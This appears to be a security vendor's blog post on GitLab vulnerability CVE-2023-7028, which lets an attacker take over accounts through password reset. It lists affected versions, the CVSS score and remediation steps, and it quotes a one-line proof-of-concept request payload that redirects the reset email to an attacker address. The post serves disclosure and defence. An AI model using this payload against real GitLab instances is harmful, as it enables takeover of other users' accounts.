Gal Nagli
CEO
An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. This is a Critical severity issue (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, 10.0). It is now mitigated in the latest release and is assigned CVE-2023-7028.
The Proof of Concept (as posted on twitter)
user[email][]=valid@email.com&user[email][]=attacker@email.com, using this payload on the reset password page on the relevant instances leads to receive the reset email token to your own email, rather than the legitimate user.
Remediation includes implementing SSO / Updating the instance and ensuring the existence of 2FA.
Closing Words
As always, our scanning engines has been evaluating the issue for our customers in matter of minutes after the announcement, and relevant notification were automatically sent.
As a proof for our speed and rapid response, we were the first to report the issue to a leading bank within HackerOne's platform.